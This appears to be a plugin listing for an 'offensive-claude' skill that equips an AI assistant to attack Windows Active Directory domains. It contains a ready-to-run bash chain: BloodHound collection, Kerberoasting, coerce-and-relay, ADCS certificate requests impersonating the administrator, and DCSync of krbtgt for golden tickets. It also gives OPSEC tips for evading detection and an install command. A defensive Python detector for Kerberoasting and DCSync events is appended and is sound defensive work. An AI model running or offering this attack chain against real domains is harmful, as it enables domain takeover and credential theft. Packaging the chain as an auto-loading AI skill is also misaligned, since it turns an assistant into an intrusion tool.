From offensive-claude
Attacks Windows Active Directory domains via Kerberos roasting/delegation, coercion + relay, ADCS abuse (ESC1-16), ticket forgery, DCSync, dMSA exploitation, and BloodHound attack-path enumeration.
How this skill is triggered — by the user, by Claude, or both
Slash command
/offensive-claude:active-directory-attack

The summary Claude sees in its skill listing — used to decide when to auto-load this skill
- Attacking Windows domain environments after gaining any domain foothold (creds, hash, or unauth network position)
- references/adcs-abuse.md
- references/bloodhound-enum-lateral.md
- references/coercion-relay.md
- references/dmsa-badsuccessor.md
- references/kerberos-roasting-delegation.md
- references/ticket-forgery-dcsync.md
- scripts/Get-BadSuccessorOUPermissions.ps1
- scripts/ad_recon.py
- scripts/adcs_esc_finder.py
- scripts/coerce_relay_chain.sh
- scripts/kerberoast_audit.py
- scripts/rbcd_takeover.py

| Technique | ATT&CK | CWE | Reference | Script |
|---|---|---|---|---|
| BloodHound CE / SharpHound enumeration | T1482 | CWE-732 | references/bloodhound-enum-lateral.md | scripts/ad_recon.py |
| Password spray / PtH / PtT lateral movement | T1550.002, T1550.003 | CWE-522 | references/bloodhound-enum-lateral.md | scripts/ad_recon.py |
| LAPS / gMSA password read | T1003 | CWE-522 | references/bloodhound-enum-lateral.md | scripts/ad_recon.py |
| Kerberoasting | T1558.003 | CWE-261 | references/kerberos-roasting-delegation.md | scripts/kerberoast_audit.py |
| AS-REP roasting | T1558.004 | CWE-308 | references/kerberos-roasting-delegation.md | scripts/kerberoast_audit.py |
| Resource-Based Constrained Delegation (RBCD) | T1558, T1098 | CWE-269 | references/kerberos-roasting-delegation.md | scripts/rbcd_takeover.py |
| Constrained/Unconstrained delegation (S4U) | T1558 | CWE-269 | references/kerberos-roasting-delegation.md | scripts/rbcd_takeover.py |
| Coercion (PetitPotam/DFSCoerce/PrinterBug/WebDAV) | T1187 | CWE-294 | references/coercion-relay.md | scripts/coerce_relay_chain.sh |
| NTLM relay (SMB/LDAP/ADCS) | T1557.001 | CWE-294 | references/coercion-relay.md | scripts/coerce_relay_chain.sh |
| NTLM reflection (CVE-2025-33073) | T1187, T1557.001 | CWE-294 | references/coercion-relay.md | scripts/coerce_relay_chain.sh |
| Kerberos relay / DNS CNAME (CVE-2026-20929) | T1557 | CWE-294 | references/coercion-relay.md | scripts/coerce_relay_chain.sh |
| ADCS ESC1 (SAN) / ESC15 EKUwu (CVE-2024-49019) | T1649 | CWE-295 | references/adcs-abuse.md | scripts/adcs_esc_finder.py |
| ADCS ESC8 relay / ESC16 CA-wide override | T1649, T1557.001 | CWE-295 | references/adcs-abuse.md | scripts/adcs_esc_finder.py |
| Golden / Silver / Diamond / Sapphire ticket | T1558.001, T1558.002 | CWE-345 | references/ticket-forgery-dcsync.md | - |
| DCSync (DRSUAPI replication) | T1003.006 | CWE-269 | references/ticket-forgery-dcsync.md | - |
| noPac / sAMAccountName spoofing (CVE-2021-42278/87) | T1558 | CWE-287 | references/ticket-forgery-dcsync.md | - |
| dMSA BadSuccessor (CVE-2025-53779) | T1098, T1558 | CWE-269 | references/dmsa-badsuccessor.md | scripts/Get-BadSuccessorOUPermissions.ps1 |
```bash
# 0. Sync clock to DC (Kerberos needs +/-5 min)
sudo ntpdate <DC_IP> # or: faketime "$(net time -S <DC>)" <cmd>
# 1. Enumerate: BloodHound CE collection (Linux) + own the graph
bloodhound-python -u user -p 'Pass' -d corp.local -dc dc01.corp.local -ns <DC_IP> -c all --zip
# (use the bloodhound-ce branch; legacy collectors break CE ingest)
nxc ldap <DC_IP> -u user -p 'Pass' --bloodhound --collection All --dns-server <DC_IP>
# 2. Cheap wins on the graph: roast everything visible
python3 scripts/kerberoast_audit.py -d corp.local --dc-ip <DC_IP> -u user -p 'Pass' --asrep --kerberoast
# 3. Coerce + relay to LDAP/ADCS (RBCD or cert) if signing/EPA weak
bash scripts/coerce_relay_chain.sh corp.local user 'Pass' <DC_IP> <RELAY_IP> ldap
# 4. ADCS path: find ESC1-16 and grab a DA cert
python3 scripts/adcs_esc_finder.py -d corp.local -u user -p 'Pass' --dc-ip <DC_IP>
certipy req -u [email protected] -p 'Pass' -ca CA -template Vuln -upn [email protected]
certipy auth -pfx administrator.pfx -dc-ip <DC_IP> # -> NT hash / TGT
# 5. Windows Server 2025 present? Check BadSuccessor exposure
powershell -ep bypass -File scripts/Get-BadSuccessorOUPermissions.ps1
# 6. Domain dominance: DCSync krbtgt -> Golden ticket / persistence
impacket-secretsdump -just-dc-user 'corp\krbtgt' corp.local/da:'Pass'@<DC_IP>
```
| Technique | Telemetry / IOC | Detection (Sigma / EDR) | OPSEC note |
|---|---|---|---|
| SharpHound/LDAP enum | Hundreds of LDAP queries from one host; 4662 directory access | SIEM rule: single source > N LDAP queries/minute; ADWS 9389 spikes | Throttle --throttle/--jitter; prefer ADWS (SOAPHound) to dodge LDAP heuristics |
| Kerberoasting | 4769 TGS-REQ with RC4 (0x17) for many SPNs from one host | Sigma win_security_susp_kerberos_manipulation; alert on RC4 TGS bursts | Request AES-only SPNs sparingly; /rc4opsec; roast few accounts, slow |
| AS-REP roasting | 4768 AS-REQ no-preauth; etype 23 | Alert on AS-REQ for DONT_REQ_PREAUTH accounts | Only target accounts BloodHound flags; offline crack |
| Coercion | EFSRPC/DFSNM/RPRN named-pipe calls; auth from server to odd host | Sigma coercion/PetitPotam; RPC firewall (RpcFilter) logs | Coercion is "by design"; NTLM removal on 2025/24H2 forces Kerberos fallback |
| NTLM relay / reflection | 4624/4648 NTLM logon to self; SMB→LDAP from non-server | Detect SMB-signing:False targets; CVE-2025-33073 DNS marshalled record | Needs signing:False target; patch (Jun 2025) detects marshalled DNS struct |
| ADCS ESC | 4886/4887 cert issuance; cert with arbitrary SAN/UPN; client-auth EKU on web template | Sigma ADCS issuance anomalies; certutil monitoring; ESC15 EKU injection | Restore templates (ESC4); EPA on certsrv breaks ESC8 relay |
| Ticket forgery | TGT lifetime anomalies; PAC w/o validation; 4769 for krbtgt SPN | Golden: ticket lifetime > policy; Sapphire mimics real PAC (hard) | Match domain ticket policy lifetimes; use AES keys not RC4 |
| DCSync | 4662 DRSUAPI GetNCChanges from non-DC | Sigma dcsync; alert DRSUAPI replication from non-DC IP | Run from a host that looks like a DC; avoid /all, target krbtgt only |
| dMSA BadSuccessor | 5137 dMSA create; 5136 write to msDS-ManagedAccountPrecededByLink | Sigma SharpSuccessor exec; SACL on dMSA attrs (off by default!) | Patched (Aug 2025) needs both sides controlled; still a creds-dump primitive |
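As an added defender-side example (not part of the offensive-claude skill or its scripts), the following Python implements two rows of the detection table above over constructed Windows Security events: the Kerberoasting signature (many 4769 TGS-REQs with RC4 etype 0x17 from one source in a short window) and the DCSync signature (4662 granting the DS-Replication-Get-Changes extended rights, joined to a 4624 logon by logon ID so the source address can be compared against a known-DC inventory). The event field shapes, the thresholds, the `DC_IPS` inventory and every IP address are assumptions; the two extended-rights GUIDs are the real well-known values.

```python
"""Detection logic for two rows of the table: Kerberoasting bursts (4769,
etype 0x17) and DCSync (4662 with replication extended rights from a
non-DC). All events below are constructed samples, not real telemetry."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Well-known extended-rights GUIDs that DRSUAPI replication (GetNCChanges) needs.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Assumed inventory of domain controllers (hypothetical addresses).
DC_IPS = {"10.0.0.5", "10.0.0.6"}

T0 = datetime(2025, 6, 1, 9, 0, 0)  # constructed base timestamp

def ev(event_id, secs, **fields):
    """Build a minimal event dict resembling a parsed Security log record."""
    return {"EventID": event_id, "Time": T0 + timedelta(seconds=secs), **fields}

RC4_SPNS = ["MSSQLSvc/sql01", "HTTP/web01", "CIFS/fs01",
            "MSSQLSvc/sql02", "ldap/svc-ldap", "HOST/app01"]
SAMPLE_EVENTS = [
    # Burst of RC4 service-ticket requests from one workstation: roasting pattern.
    *[ev(4769, 10 * i, IpAddress="10.0.0.50", ServiceName=s, TicketEncryptionType="0x17")
      for i, s in enumerate(RC4_SPNS)],
    # AES (0x12) tickets from a normal host: not roasting.
    *[ev(4769, 10 * i, IpAddress="10.0.0.51", ServiceName=s, TicketEncryptionType="0x12")
      for i, s in enumerate(RC4_SPNS[:5])],
    # Two RC4 requests hours apart: below the burst threshold.
    ev(4769, 0, IpAddress="10.0.0.52", ServiceName="MSSQLSvc/sql01", TicketEncryptionType="0x17"),
    ev(4769, 7200, IpAddress="10.0.0.52", ServiceName="HTTP/web01", TicketEncryptionType="0x17"),
    # Logons that the 4662 events below are joined to (4662 carries no client address).
    ev(4624, 0, TargetLogonId="0x3e7b2", TargetUserName="jdoe", IpAddress="10.0.0.50"),
    ev(4624, 0, TargetLogonId="0x5a1", TargetUserName="DC02$", IpAddress="10.0.0.6"),
    # Replication access: from a workstation, from a real DC, and with no logon seen.
    ev(4662, 120, SubjectLogonId="0x3e7b2", SubjectUserName="jdoe", AccessMask="0x100",
       Properties=f"{{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"),
    ev(4662, 130, SubjectLogonId="0x5a1", SubjectUserName="DC02$", AccessMask="0x100",
       Properties=f"{{{DS_REPLICATION_GET_CHANGES}}}"),
    ev(4662, 140, SubjectLogonId="0x999", SubjectUserName="svc_backup", AccessMask="0x100",
       Properties=f"{{{DS_REPLICATION_GET_CHANGES_ALL}}}"),
]

def detect_kerberoast_bursts(events, window=timedelta(minutes=5), min_spns=5):
    """Return {source_ip: sorted SPNs} for sources that requested RC4 (0x17)
    service tickets for at least `min_spns` distinct SPNs within `window`."""
    per_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4769 and e["TicketEncryptionType"] == "0x17":
            per_ip[e["IpAddress"]].append((e["Time"], e["ServiceName"]))
    hits = {}
    for ip, reqs in per_ip.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # slide the window over each request
            spns = {spn for t, spn in reqs[i:] if t - start <= window}
            if len(spns) >= min_spns:
                hits[ip] = sorted(spns)
                break
    return hits

def detect_dcsync(events):
    """Return [(source_ip, user)] for 4662 events that exercise replication
    extended rights from an address not in DC_IPS. The source address comes
    from the 4624 logon with the same logon ID; 'unknown' if none was seen."""
    logon_ip = {e["TargetLogonId"]: e["IpAddress"] for e in events if e["EventID"] == 4624}
    hits = []
    for e in events:
        if e["EventID"] != 4662 or e["AccessMask"] != "0x100":  # 0x100 = control access
            continue
        rights = {g.lower() for g in GUID_RE.findall(e["Properties"])}
        if not rights & REPLICATION_RIGHTS:
            continue
        ip = logon_ip.get(e["SubjectLogonId"], "unknown")
        if ip not in DC_IPS:
            hits.append((ip, e["SubjectUserName"]))
    return hits

if __name__ == "__main__":
    print("Kerberoast bursts:", detect_kerberoast_bursts(SAMPLE_EVENTS))
    print("DCSync from non-DC:", detect_dcsync(SAMPLE_EVENTS))
```

The thresholds correspond to the table's "single source > N per window" style rule; in production the event list would be fed from a log pipeline, and the 4662-to-4624 join is what makes the "from non-DC IP" condition checkable, since 4662 records a logon ID but no client address. An unmatched logon ID is reported as `unknown` rather than dropped, so a gap in 4624 coverage cannot hide a replication request.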
```bash
npx claudepluginhub hypnguyen1209/offensive-claude --plugin offensive-claude
```

Enumerates Active Directory objects, discovers attack paths with BloodHound, exploits Kerberos weaknesses, and escalates privileges via ADCS/DCSync to demonstrate domain compromise.
Conducts an Active Directory penetration test: enumerate domain objects, discover attack paths with BloodHound, exploit Kerberos, escalate via ADCS/DCSync.
Guides red team attacks on Microsoft Active Directory with reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation using BloodHound, Impacket, Mimikatz.